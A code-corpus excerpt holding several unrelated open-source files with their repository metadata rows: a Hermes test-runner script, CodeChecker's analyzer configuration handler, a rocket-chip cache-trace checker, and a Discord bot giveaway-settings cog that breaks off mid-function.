TestFlag.COMPILE_TIMEOUT: 0,
TestFlag.EXECUTE_FAILED: 0,
TestFlag.EXECUTE_TIMEOUT: 0,
TestFlag.TEST_PASSED: 0,
TestFlag.TEST_SKIPPED: 0,
TestFlag.TEST_PERMANENTLY_SKIPPED: 0,
TestFlag.TEST_UNEXPECTED_PASSED: 0,
}
slowest_tests = [("", 0)] * num_slowest_tests
with Pool(processes=jobs) as pool:
for res in pool.imap_unordered(calcParams, calls, 1):
testname = res[0]
results.append(res)
(hermesStatus, errString, duration) = res[1]
resultsHist[hermesStatus] += 1
insert_pos = len(slowest_tests)
for i, (_, other_duration) in reversed(list(enumerate(slowest_tests))):
if duration < other_duration:
break
else:
insert_pos = i
if insert_pos < len(slowest_tests):
# If this was one of the slowest tests, push it into the list
# and drop the bottom of the list.
slowest_tests = (
slowest_tests[:insert_pos]
+ [(testname, duration)]
+ slowest_tests[insert_pos:-1]
)
if (
fail_fast
and hermesStatus != TestFlag.TEST_PASSED
and hermesStatus != TestFlag.TEST_SKIPPED
and hermesStatus != TestFlag.TEST_PERMANENTLY_SKIPPED
):
break
# Filter out missing test names in case there were fewer tests run than the top slowest tests.
slowest_tests = [
(testName, duration) for testName, duration in slowest_tests if testName
]
return results, resultsHist, slowest_tests
def get_arg_parser():
parser = argparse.ArgumentParser(description="Run javascript tests with Hermes.")
parser.add_argument(
"paths",
type=str,
nargs="+",
help="Paths to test suite, can be either dir or file name",
)
parser.add_argument(
"-c",
"--chunk",
dest="chunk",
default=-1,
type=int,
help="Chunk ID (0, 1, 2), to only process 1/3 of all tests",
)
parser.add_argument(
"-f",
"--fast-fail",
dest="fail_fast",
action="store_true",
help="Exit script immediately when a test failed.",
)
parser.add_argument(
"-k",
"--keep-tmp",
dest="keep_tmp",
action="store_true",
help="Keep temporary files of successful tests.",
)
parser.add_argument(
"--test-skiplist",
dest="test_skiplist",
action="store_true",
help="Also test if tests in the skiplist fail",
)
parser.add_argument(
"-a",
"--show-all",
dest="show_all",
action="store_true",
help="show results of successful tests.",
)
parser.add_argument(
"--hvm-filename",
dest="hvm_filename",
default="hvm",
help="Filename for hvm binary (e.g., hvm-lean)",
)
parser.add_argument(
"-j",
"--jobs",
dest="jobs",
default=None,
type=int,
help="Number of jobs to run simultaneously. By default "
+ "equal to the number of CPUs.",
)
parser.add_argument(
"-m",
"--match",
dest="match",
default=None,
type=str,
help="Optional. Substring that the test filename must "
"contain in order to run.",
)
parser.add_argument(
"-s",
"--source",
dest="source",
action="store_true",
help="Instead of running any tests, print the source of "
"the matched test case (use -m/--match) to standard "
"output, including any generated use-strict "
"directives or stubbed pragmas. (You could then "
"pipe this to hermes.)",
)
parser.add_argument(
"--num-slowest-tests",
dest="num_slowest_tests",
type=int,
default=10,
help="Print the top N tests that take the longest time to execute on "
"average, where N is the option value",
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",
default=False,
action="store_true",
help="Show intermediate output",
)
return parser
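# Illustrative sketch of driving the parser programmatically; the test path is
# a placeholder for a local test262 checkout and this helper is never called
# by the suite itself.
def _example_parse_args():
    parser = get_arg_parser()
    return parser.parse_args(
        ["-j", "8", "--match", "Array", "test262/test/built-ins"]
    )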
def run(
paths,
chunk,
fail_fast,
binary_path,
hvm,
jobs,
is_verbose,
match,
source,
test_skiplist,
num_slowest_tests,
keep_tmp,
show_all,
):
global count
global verbose
verbose = is_verbose
onlyfiles = []
for path in paths:
if isdir(path):
for root, _dirnames, filenames in os.walk(path):
for filename in filenames:
onlyfiles.append(os.path.join(root, filename))
elif isfile(path):
onlyfiles.append(path)
else:
print("Invalid path: " + path)
sys.exit(1)
onlyfiles = [f for f in onlyfiles if f.endswith(".js") if not match or match in f]
# Generates the source for the single provided file,
# without an extra "use strict" directive prepended to the file.
# Handles [noStrict] and [onlyStrict] flags.
if source:
if len(onlyfiles) != 1:
print("Need exactly one file matched by the -m/--match option.")
print("Got these files: " + ", ".join(onlyfiles))
sys.exit(1)
with open(onlyfiles[0], "rb") as f:
content = f.read().decode("utf-8")
match = flagsMatcher.search(content)
flags = set()
if match:
flags = {flag.strip() for flag in match.group(1).split(",")}
strict = False
if "noStrict" in flags or "raw" in flags:
strict = False
if "onlyStrict" in flags:
strict = True
print(generateSource(content, strict, getSuite(onlyfiles[0]), flags)[0])
sys.exit(0)
rangeLeft = 0
rangeRight = len(onlyfiles) - 1
if chunk != -1:
if chunk == 0:
rangeRight = rangeRight // 3 - 1
elif chunk == 1:
rangeLeft = rangeRight // 3
rangeRight = rangeRight - rangeLeft
elif chunk == 2:
rangeLeft = rangeRight - rangeRight // 3 + 1
else:
print("Invalid chunk ID")
sys.exit(1)
if not os.path.isfile(join(binary_path, "hermes")):
print("{} not found.".format(join(binary_path, "hermes")))
sys.exit(1)
if not os.path.isfile(join(binary_path, hvm)):
print("{} not found.".format(join(binary_path, hvm)))
sys.exit(1)
esprima_runner = esprima.EsprimaTestRunner(verbose)
calls = makeCalls(
(test_skiplist, keep_tmp, binary_path, hvm, esprima_runner),
onlyfiles,
rangeLeft,
rangeRight,
)
results, resultsHist, slowest_tests = testLoop(
calls, jobs, fail_fast, num_slowest_tests
)
# Sort the results for easier reading of failed tests.
results.sort(key=lambda f: f[1][0].value)
if results:
print("")
for testName, (hermesStatus, errString, _) in results:
if show_all or (
(hermesStatus != TestFlag.TEST_PASSED)
and (hermesStatus != TestFlag.TEST_SKIPPED)
and (hermesStatus != TestFlag.TEST_PERMANENTLY_SKIPPED)
):
print("{} {}".format(str(hermesStatus), testName))
if errString:
print("{}".format(textwrap.indent(errString, "\t")))
if slowest_tests:
print()
print("Top {:d} slowest tests".format(len(slowest_tests)))
maxNameWidth = 0
maxNumWidth = 0
for testName, duration in slowest_tests:
maxNameWidth = max(maxNameWidth, len(testName))
maxNumWidth = max(maxNumWidth, len("{:.3f}".format(duration)))
for testName, duration in slowest_tests:
print(
"{:<{testNameWidth}} {:>{durationWidth}.3f}".format(
testName,
duration,
# Add 3 just in case it's right at the borderline
testNameWidth=maxNameWidth + 3,
durationWidth=maxNumWidth,
)
)
print()
total = sum(resultsHist.values())
failed = (
resultsHist[TestFlag.COMPILE_FAILED]
+ resultsHist[TestFlag.COMPILE_TIMEOUT]
+ resultsHist[TestFlag.EXECUTE_FAILED]
+ resultsHist[TestFlag.EXECUTE_TIMEOUT]
+ resultsHist[TestFlag.TEST_UNEXPECTED_PASSED]
)
eligible = (
sum(resultsHist.values())
- resultsHist[TestFlag.TEST_SKIPPED]
- resultsHist[TestFlag.TEST_PERMANENTLY_SKIPPED]
)
if eligible > 0:
passRate = "{0:.2%}".format(resultsHist[TestFlag.TEST_PASSED] / eligible)
else:
passRate = "--"
if (eligible - resultsHist[TestFlag.TEST_PASSED]) > 0:
resultStr = "{}FAIL{}".format(Color.RED, Color.RESET)
else:
resultStr = "{}PASS{}".format(Color.GREEN, Color.RESET)
# Turn off formatting so that the table looks nice in source code.
# fmt: off
print("-----------------------------------")
print("| Results | {} |".format(resultStr))
print("|----------------------+----------|")
print("| Total | {:>8} |".format(total))
print("| Pass | {:>8} |".format(resultsHist[TestFlag.TEST_PASSED]))
print("| Fail | {:>8} |".format(failed))
print("| Skipped | {:>8} |".format(resultsHist[TestFlag.TEST_SKIPPED]))
print("| Permanently Skipped | {:>8} |".format(resultsHist[TestFlag.TEST_PERMANENTLY_SKIPPED]))
print("| Pass Rate | {:>8} |".format(passRate))
print("-----------------------------------")
print("| Failures | |")
print("|----------------------+----------|")
print("| Compile fail | {:>8} |".format(resultsHist[TestFlag.COMPILE_FAILED]))
print("| Compile timeout | {:>8} |".format(resultsHist[TestFlag.COMPILE_TIMEOUT]))
print("| Execute fail | {:>8} |".format(resultsHist[TestFlag.EXECUTE_FAILED]))
print("| Execute timeout | {:>8} |".format(resultsHist[TestFlag.EXECUTE_TIMEOUT]))
if test_skiplist:
print("| Skiplisted passes | {:>8} |".format(resultsHist[TestFlag.TEST_UNEXPECTED_PASSED]))
print("-----------------------------------")
# fmt: on
return (eligible - resultsHist[TestFlag.TEST_PASSED]) > 0
| 34.410714
| 102
| 0.569907
|
fb290dc711627dd9d2620f483426a24bc92ece67
| 10,454
|
py
|
Python
|
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
analyzer/codechecker_analyzer/analyzers/config_handler.py
|
gargaroff/codechecker
|
f3574a373f454dc57f813225af6e54824f194e23
|
[
"Apache-2.0"
] | null | null | null |
# -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
"""
Static analyzer configuration handler.
"""
from abc import ABCMeta
from operator import itemgetter
import collections
import platform
import subprocess
import sys
from codechecker_common.logger import get_logger
LOG = get_logger('system')
# The baseline handling of checks in every analyzer is to let the analysis
# engine decide which checks are worth running. Checks handled this way
# (implicitly by the analyzer) are considered to have a CheckerState of
# default. If the check however appears in profiles, and such a profile is
# enabled explicitly on the command-line or implicitly as in case of the
# default profile, then they are considered to have a CheckerState of enabled.
# Likewise for individually enabled checks. If a check is however explicitly
# disabled on the command-line, or belongs to a profile explicitly disabled
# on the command-line, then it is considered to have a CheckerState of
# disabled.
# TODO: Use enum when upgrading to Python3.
class CheckerState(object):
default = 0
disabled = 1
enabled = 2
STATES = {'default', 'disabled', 'enabled'}
NAMES = {0: 'default', 1: 'disabled', 2: 'enabled'}
class AnalyzerConfigHandler(object, metaclass=ABCMeta):
"""
Handle the checker configurations and enabled disabled checkers lists.
"""
def __init__(self):
self.analyzer_binary = None
self.analyzer_plugins_dir = None
self.analyzer_extra_arguments = []
self.checker_config = ''
self.report_hash = None
# The key is the checker name, the value is a tuple.
# False if disabled (should be by default).
# True if checker is enabled.
# (False/True, 'checker_description')
self.__available_checkers = collections.OrderedDict()
@property
def analyzer_plugins(self):
""" Full path of the analyzer plugins. """
return []
def get_version(self, env=None):
""" Get analyzer version information. """
version = [self.analyzer_binary, '--version']
try:
output = subprocess.check_output(version,
env=env,
universal_newlines=True,
encoding="utf-8",
errors="ignore")
return output
except (subprocess.CalledProcessError, OSError) as oerr:
LOG.warning("Failed to get analyzer version: %s",
' '.join(version))
LOG.warning(oerr)
return None
def add_checker(self, checker_name, description='',
state=CheckerState.default):
"""
Add additional checker. If no state argument is given, the actual usage
of the checker is handled by the analyzer.
"""
self.__available_checkers[checker_name] = (state, description)
def set_checker_enabled(self, checker_name, enabled=True):
"""
Explicitly handle checker state, keep description if already set.
"""
for ch_name, values in self.__available_checkers.items():
if ch_name.startswith(checker_name) or \
ch_name.endswith(checker_name):
_, description = values
state = CheckerState.enabled if enabled \
else CheckerState.disabled
self.__available_checkers[ch_name] = (state, description)
def checks(self):
"""
Return the checkers.
"""
return self.__available_checkers
def __gen_name_variations(self):
"""
Generate all applicable name variations from the given checker list.
"""
checker_names = (name for name in self.__available_checkers)
reserved_names = []
for name in checker_names:
delim = '.' if '.' in name else '-'
parts = name.split(delim)
# Creates a list of variations from a checker name, e.g.
# ['security', 'security.insecureAPI', 'security.insecureAPI.gets']
# from 'security.insecureAPI.gets' or
# ['misc', 'misc-dangling', 'misc-dangling-handle']
# from 'misc-dangling-handle'.
v = [delim.join(parts[:(i + 1)]) for i in range(len(parts))]
reserved_names += v
return reserved_names
def initialize_checkers(self,
analyzer_context,
checkers,
cmdline_enable=[],
enable_all=False):
"""
Add checkers and set their "enabled/disabled" status. The following
inputs are considered in this order:
- First the default state is taken based on the analyzer tool.
- Members of "default" profile are enabled.
- In case of "--enable-all" every checker is enabled except for "alpha"
and "debug" checker groups. "osx" checker group is also not included
unless the target platform is Darwin.
- Command line "--enable/--disable" flags.
- Their arguments may start with "profile:" or "guideline:" prefix
which makes the choice explicit.
- Without prefix it means a profile name, a guideline name or a
checker group/name in this priority order.
analyzer_context -- Context object.
checkers -- [(checker name, description), ...] Checkers to add with
their description.
cmdline_enable -- [(argument, enabled), ...] Arguments of
"--enable/--disable" flags and a boolean value
whether it is after "--enable" or not.
enable_all -- Boolean value whether "--enable-all" is given.
"""
profile_map = analyzer_context.profile_map
guideline_map = analyzer_context.guideline_map
if 'profile:list' in map(itemgetter(0), cmdline_enable):
LOG.error("'list' is a reserved profile keyword. ")
LOG.error("Please choose another profile name in "
"%s/config/checker_profile_map.json and rebuild.",
analyzer_context.package_root)
sys.exit(1)
if 'guideline:list' in map(itemgetter(0), cmdline_enable):
LOG.error("'list' is a reserved guideline keyword. ")
LOG.error("Please choose another guideline name in "
"%s/config/checker_guideline_map.json and rebuild.",
analyzer_context.package_root)
sys.exit(1)
# Add all checkers marked as default. This means the analyzer should
# manage whether it is enabled or disabled.
for checker_name, description in checkers:
self.add_checker(checker_name, description)
# Set default enabled or disabled checkers, based on the config file.
default_profile_checkers = profile_map.by_profile('default')
if not default_profile_checkers:
# Check whether a default profile exists.
LOG.warning("No default profile found!")
else:
# Turn default checkers on.
for checker in default_profile_checkers:
self.set_checker_enabled(checker)
# If enable_all is given, almost all checkers should be enabled.
if enable_all:
for checker_name, enabled in checkers:
if not checker_name.startswith("alpha.") and \
not checker_name.startswith("debug.") and \
not checker_name.startswith("osx."):
# There are a few exceptions, though, which still need to
# be manually enabled by the user: alpha and debug.
self.set_checker_enabled(checker_name)
if checker_name.startswith("osx.") and \
platform.system() == 'Darwin':
# OSX checkers are only enable-all'd if we are on OSX.
self.set_checker_enabled(checker_name)
# Set user defined enabled or disabled checkers from the command line.
# Construct a list of reserved checker names.
# (It is used to check if a profile name is valid.)
reserved_names = self.__gen_name_variations()
for identifier, enabled in cmdline_enable:
if identifier.startswith('profile:'):
profile_name = identifier[len('profile:'):]
if profile_name not in profile_map.available_profiles():
LOG.error('No such profile: %s', profile_name)
sys.exit(1)
for checker in profile_map.by_profile(profile_name):
self.set_checker_enabled(checker, enabled)
            elif identifier.startswith('guideline:'):
guideline_name = identifier[len('guideline:'):]
if guideline_name not in guideline_map.available_guidelines():
LOG.error('No such guideline: %s', guideline_name)
sys.exit(1)
for checker in guideline_map.by_guideline(guideline_name):
self.set_checker_enabled(checker, enabled)
elif identifier in profile_map.available_profiles():
if identifier in reserved_names:
LOG.warning("Profile name '%s' conflicts with a "
"checker(-group) name.", identifier)
for checker in profile_map.by_profile(identifier):
self.set_checker_enabled(checker, enabled)
elif identifier in guideline_map.available_guidelines():
if identifier in reserved_names:
LOG.warning("Guideline name '%s' conflicts with a "
"checker(-group) name.", identifier)
for checker in guideline_map.by_guideline(identifier):
self.set_checker_enabled(checker, enabled)
else:
self.set_checker_enabled(identifier, enabled)
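# Illustrative sketch of the inputs initialize_checkers() expects; the checker,
# profile and guideline names are made up, and a real call needs a concrete
# AnalyzerConfigHandler subclass plus the analyzer context object:
#
#     checkers = [("example.checker", "An example checker description")]
#     cmdline_enable = [
#         ("profile:sensitive", True),   # enable every checker in a profile
#         ("guideline:sei-cert", True),  # enable a guideline's checkers
#         ("example.checker", False),    # disable one checker by name
#     ]
#     handler.initialize_checkers(context, checkers, cmdline_enable)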
| 43.377593
| 79
| 0.594892
|
5d59faa16860e4129ae3024106a55e47cfab96db
| 2,151
|
py
|
Python
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 1,199
|
2019-06-18T23:08:07.000Z
|
2022-03-31T08:21:58.000Z
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 656
|
2019-06-20T09:21:59.000Z
|
2022-03-31T15:37:04.000Z
|
scripts/check_cache_trace.py
|
NeHalem90/rocket-chip
|
90d4ccd720f7bad0a62c99b55f057b2e50ace218
|
[
"Apache-2.0"
] | 495
|
2019-06-19T01:38:31.000Z
|
2022-03-31T11:42:23.000Z
|
import sys
from collections import defaultdict
# Checks a trace of cache transactions to make sure the data is correct
# Note: this will only work if the L2 agent only receives cached traffic
# (either caching Acquires or Releases). If there are any builtin
# Put or PutBlock requests, they will not be reflected in the trace
# and the data will appear to be incorrect.
DATA_BEATS = 8
def parse_prm(fname):
mem_data_bits = 0
cache_block_bytes = 0
with open(fname) as f:
for line in f:
line = line.strip("() \t\n")
parts = line.split(",")
if parts[0] == "MEM_DATA_BITS":
mem_data_bits = int(parts[1])
            elif parts[0] == "CACHE_BLOCK_BYTES":
                cache_block_bytes = int(parts[1])
    # DATA_BEATS is module-level state used by data_block(), so update the
    # global, and keep it an integer.
    global DATA_BEATS
    DATA_BEATS = (cache_block_bytes * 8) // mem_data_bits
def data_block():
return [0] * DATA_BEATS
blocks = defaultdict(data_block)
def process_release(addr_block, addr_beat, data):
blocks[addr_block][addr_beat] = data
def process_get(addr_block, addr_beat, data):
stored_data = blocks[addr_block][addr_beat]
if stored_data != data:
print("Error {:07x},{}: {:016x} != {:016x}".format(
addr_block, addr_beat, stored_data, data))
def process_line(line):
if not line:
return
pieces = line.split()
if pieces[0] == "[release]":
addr_block = int(pieces[1].split('=')[1], 16)
addr_beat = int(pieces[2].split('=')[1])
data = int(pieces[3].split('=')[1], 16)
process_release(addr_block, addr_beat, data)
if pieces[0] == "[get]":
addr_block = int(pieces[1].split('=')[1], 16)
addr_beat = int(pieces[2].split('=')[1])
data = int(pieces[3].split('=')[1], 16)
process_get(addr_block, addr_beat, data)
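# The parser above expects trace lines shaped like the following (hypothetical
# values; addresses and data are parsed as hex, the beat index as decimal):
#   [release] addr_block=0000123 addr_beat=3 data=deadbeefcafef00d
#   [get] addr_block=0000123 addr_beat=3 data=deadbeefcafef00d
# A [release] records the data written back for a block/beat; a later [get] of
# the same block/beat is checked against that stored value.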
def check_trace(fname):
with open(fname) as f:
for line in f:
process_line(line.strip())
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: {} trace.out [params.prm]".format(sys.argv[0]))
sys.exit(-1)
if len(sys.argv) > 2:
parse_prm(sys.argv[2])
check_trace(sys.argv[1])
| 32.590909
| 72
| 0.611808
|
893318527a7c4bba4f3cf74454c101ac7fd37e53
| 18,915
|
py
|
Python
|
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
giveaways/gset.py
|
Shukla-G/cray-cogs
|
b852194ed373912c002be05be7216f7bfe54dc19
|
[
"MIT"
] | null | null | null |
from typing import Union
import discord
from redbot.core import commands
from redbot.core.bot import Red
from redbot.core.utils.chat_formatting import box, humanize_list
from .main import Giveaways
from .models import config, get_guild_settings, get_role
class Gset(Giveaways, name="Giveaways"):
"""
Host embedded giveaways in your server with the help of reactions.
    This cog is complex and can be resource intensive on your bot.
    Use the `giveaway explain` command for an in-depth explanation of how to use the commands."""
def __init__(self, bot: Red):
super().__init__(bot)
@commands.group(
name="giveawaysettings", aliases=["gset", "giveawaysetting"], invoke_without_command=True
)
@commands.admin_or_permissions(administrator=True)
async def gset(self, ctx):
"""
Customize giveaways to how you want them.
        Each subcommand represents a separate setting."""
await ctx.send_help("gset")
@gset.command(name="gmsg", usage="<message>")
@commands.admin_or_permissions(administrator=True)
async def gset_gmsg(self, ctx, *, message):
"""
Set a custom giveaway message.
This message shows above the giveaway embed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.msg.set(message)
await ctx.reply(f"The new giveaway message has been set to \n```\n{message}\n```")
@gset.command(name="tmsg")
@commands.admin_or_permissions(administrator=True)
async def gset_tmsg(self, ctx, *, message):
"""
Set a custom message for giveaways.
This message gets sent in an embed when you use the `--thank` flag while starting a giveaway.
Usable variables:
- donor :
donor.mention
donor.display_name
donor.name
donor.id
- prize
Use these variables within curly brackets.
For Example:
`[p]gset tmsg Donated by: {donor.mention}
Prize: **{prize}**
Please thank **{donor.name}** in #general`"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.tmsg.set(message)
        await ctx.reply(f"The new giveaway thank message has been set to \n```\n{message}\n```")
@gset.command(name="emoji", usage="<emoji>")
@commands.admin_or_permissions(administrator=True)
async def gset_emoji(self, ctx, emoji: Union[discord.Emoji, discord.PartialEmoji]):
"""
Set a custom giveaway emoji that the bot reacts with on giveaway embeds.
        The bot must have access to the emoji for it to be used."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.emoji.set(str(emoji))
await ctx.reply(f"The new giveaway emoji has been set to {emoji}")
@gset.command(name="winnerdm", usage="<status>")
@commands.admin_or_permissions(administrator=True)
async def gset_winnerdm(self, ctx, status: bool):
"""
Set whether the bot dms the winners when the giveaway ends.
This won't be able to dm if the winners have their dms closed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.winnerdm.set(status)
await ctx.reply(
"The winner will be dm'ed when the giveaway ends now."
if status == True
else "The winner will not be dm'ed when the giveaway ends."
)
@gset.command(name="hostdm", usage="<status>")
@commands.admin_or_permissions(administrator=True)
async def gset_hostdm(self, ctx, status: bool):
"""
Set whether the bot dms the host when the giveaway ends.
This won't be able to dm if the host has their dms closed."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.hostdm.set(status)
await ctx.reply(
"The host will be dm'ed when the giveaway ends now."
if status == True
else "The host will not be dm'ed when the giveaway ends."
)
@gset.command(name="endmsg", usage="<message>")
@commands.admin_or_permissions(administrator=True)
async def gset_endmsg(self, ctx, *, message):
"""
Set the message that gets sent when a giveaway ends.
Usable variables:
- prize : The prize of the giveaway
- winner : The winner(s) of the giveaway
- link : The jumplink to the giveaway.
For example:
        `[p]gset endmsg Congratulations {winner}! You have won the giveaway for **{prize}**.
{link}`"""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.endmsg.set(message)
await ctx.reply(f"The ending message has been changed to\n```\n{message}\n```")
@gset.command(name="manager", aliases=["managers"])
@commands.admin_or_permissions(administrator=True)
async def gset_manager(self, ctx, *roles: discord.Role):
"""
Set roles that can manage giveaways in your server.
        If you don't set this up, users will need either the manage messages permission or the server's bot mod role."""
if not roles:
return await ctx.send(
"You need to provide proper role ids or mentions to add them as managers"
)
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.manager() as managers:
roles = set(roles)
managers += [role.id for role in roles]
await ctx.reply(
f"{humanize_list([role.mention for role in roles])} have been set as the giveaway managers!",
allowed_mentions=discord.AllowedMentions(roles=False, replied_user=False),
)
@gset.command(name="pingrole", usage="<role>")
@commands.admin_or_permissions(administrator=True)
async def gset_pingrole(self, ctx, role: discord.Role):
"""
Set which role gets pinged in giveaways.
This only takes effect when the `--ping` flag is used in giveaways."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.pingrole.set(role.id)
await ctx.reply(
f"{role.mention} has been set as the pingrole!",
allowed_mentions=discord.AllowedMentions(roles=False, replied_user=False),
)
@gset.command(name="autodelete", aliases=["autodel"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
async def gset_autodelete(self, ctx, toggle: bool):
"""
Set whether giveaway command invocations get automatically deleted or not.
Pass true to delete and false to not."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.autodelete.set(toggle)
await ctx.reply(
"Giveaway commands will automatically delete now."
if toggle == True
else "Giveaway commands will retain."
)
@gset.command(name="blacklist", aliases=["bl"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_blacklist(self, ctx, roles: commands.Greedy[discord.Role] = None):
"""
        Blacklist roles from giveaways permanently without having to pass them as requirements each time.
You can send multiple role ids or mentions.
Sending nothing will show a list of blacklisted roles."""
if not roles:
settings = await get_guild_settings(ctx.guild.id)
roles = settings.blacklist
return await ctx.send(
embed=discord.Embed(
title=f"Giveaway Blacklisted Roles in `{ctx.guild.name}`!",
description="\n\n".join(
[
ctx.guild.get_role(role).mention
for role in roles
if ctx.guild.get_role(role)
]
)
if roles
else "No roles have been blacklisted from giveaways permanently.",
color=discord.Color.green(),
)
)
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.blacklist() as bl:
failed = []
for role in roles:
if not role.id in bl:
bl.append(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Blacklisted {humanize_list([f'`@{role.name}`' for role in roles])} permanently from giveaways."
+ (f"{humanize_list(failed)} were already blacklisted." if failed else "")
)
@gset.command(name="unblacklist", aliases=["ubl"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_unblacklist(self, ctx, roles: commands.Greedy[discord.Role]):
"""
Unblacklist previously blacklisted roles from giveaways."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.blacklist() as bl:
failed = []
for role in roles:
if role.id in bl:
bl.remove(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"UnBlacklisted {humanize_list([f'`@{role.name}`' for role in roles])} permanently from giveaways."
+ (f"{humanize_list(failed)} were never blacklisted" if failed else "")
)
@gset.group(name="bypass", aliases=["by"], invoke_without_command=True)
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass(self, ctx):
"""
See a list of roles that can bypass requirements in giveaways.
Use subcommands for more specific actions."""
settings = await get_guild_settings(ctx.guild.id)
roles = settings.bypass
return await ctx.send(
embed=discord.Embed(
title=f"Role Bypasses for `{ctx.guild.name}`!",
description="\n\n".join(
[
ctx.guild.get_role(role).mention
for role in roles
if ctx.guild.get_role(role)
]
)
if roles
else "No role bypasses set in this server.",
color=discord.Color.green(),
)
)
@gset_bypass.command(name="add", aliases=["a"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass_add(self, ctx, *roles: discord.Role):
"""
Add one or more roles to the server's bypass list."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.bypass() as by:
failed = []
for role in roles:
if role.id not in by:
by.append(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Added giveaway bypass to {humanize_list([f'`@{role.name}`' for role in roles])}."
+ (f"{humanize_list(failed)} were never allowed to bypass" if failed else "")
)
@gset_bypass.command(name="remove", aliases=["r"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_bypass_remove(self, ctx, *roles: discord.Role):
"""
Remove one or more roles from the server's bypass list."""
settings = await get_guild_settings(ctx.guild.id, False)
async with settings.bypass() as by:
failed = []
for role in roles:
if role.id in by:
by.remove(role.id)
else:
failed.append(f"`{role.name}`")
return await ctx.send(
f"Removed giveaway bypass from {humanize_list([f'`@{role.name}`' for role in roles])}."
+ (f"{humanize_list(failed)} were never allowed to bypass" if failed else "")
)
@gset.group(name="multi", aliases=["rolemulti", "rm"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def gset_multi(self, ctx):
"""
See a list for all roles that have multipliers in giveaways in this server."""
        all_roles = await config.all_roles()
        # Map each role that still exists in this guild to its stored multiplier
        # (all_roles() is assumed to return {role_id: {"multi": value, ...}}).
        roles = {
            ctx.guild.get_role(role_id): data.get("multi")
            for role_id, data in all_roles.items()
            if ctx.guild.get_role(role_id) is not None and data.get("multi")
        }
return await ctx.send(
embed=discord.Embed(
title=f"Role Multipliers for `{ctx.guild.name}`'s giveaways!",
description=box(
"\n\n".join(
[f"@{k.name:<10} {'<'+'-'*15+'>':>5} {v:>5}" for k, v in roles.items()]
)
if roles
else "No role multipliers set in this server."
),
color=discord.Color.green(),
)
)
@gset_multi.command(name="add", aliases=["a"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def role_multi_add(self, ctx, role: discord.Role, multi: int):
"""
        Add a multiplier to a given role.
        This increases the chances of members of that role winning giveaways."""
if multi > 5:
return await ctx.send("Multiplier can not be greater than 5.")
settings = await get_role(role.id)
await settings.multi.set(multi)
return await ctx.send(
f"Added `{role.name}` with multiplier `{multi}` to the server's role multipliers."
)
@gset_multi.command(name="remove", aliases=["r"])
@commands.guild_only()
@commands.admin_or_permissions(administrator=True)
@commands.bot_has_permissions(embed_links=True)
async def role_multi_remove(self, ctx, role: discord.Role):
"""
Remove multiplier from a given role."""
settings = await get_role(role.id)
await settings.multi.set(None)
return await ctx.send(f"Removed `{role.name}` from the server's role multipliers.")
@gset.command(name="color", aliases=["colour"])
@commands.admin_or_permissions(administrator=True)
async def gset_colour(self, ctx, colour: discord.Colour = discord.Color(0x303036)):
"""
        Set the colour of giveaway embeds.
        If a colour is not passed, it defaults to the invisible embed colour.
        Until this command is used, the global bot colour is used.
        Default is invisible (0x303036)."""
settings = await get_guild_settings(ctx.guild.id, False)
await settings.color.set(colour.value)
embed = discord.Embed(
title="Color successfully set!",
description=f"Embed colors for giveaways will now be set to `{colour.value}`",
color=colour,
).set_image(
url=f"https://singlecolorimage.com/get/{str(colour)[1:]}/400x100.png"
) # i love this api *chef kiss*
return await ctx.send(embed=embed)
@gset.command(name="sdr", aliases=["show_default_requirements", "showdefault", "showdefaults"])
@commands.admin_or_permissions(administrator=True)
async def gset_sdr(self, ctx):
"""
Set whether the default requirements set through `[p]gset bypass/blacklist` should be shown in the giveaway embed.
If set to False, the requirements would still be applied but not shown in the embed itself."""
settings = await get_guild_settings(ctx.guild.id, False)
current = await settings.show_defaults()
await settings.show_defaults.set(not current)
return await ctx.send(
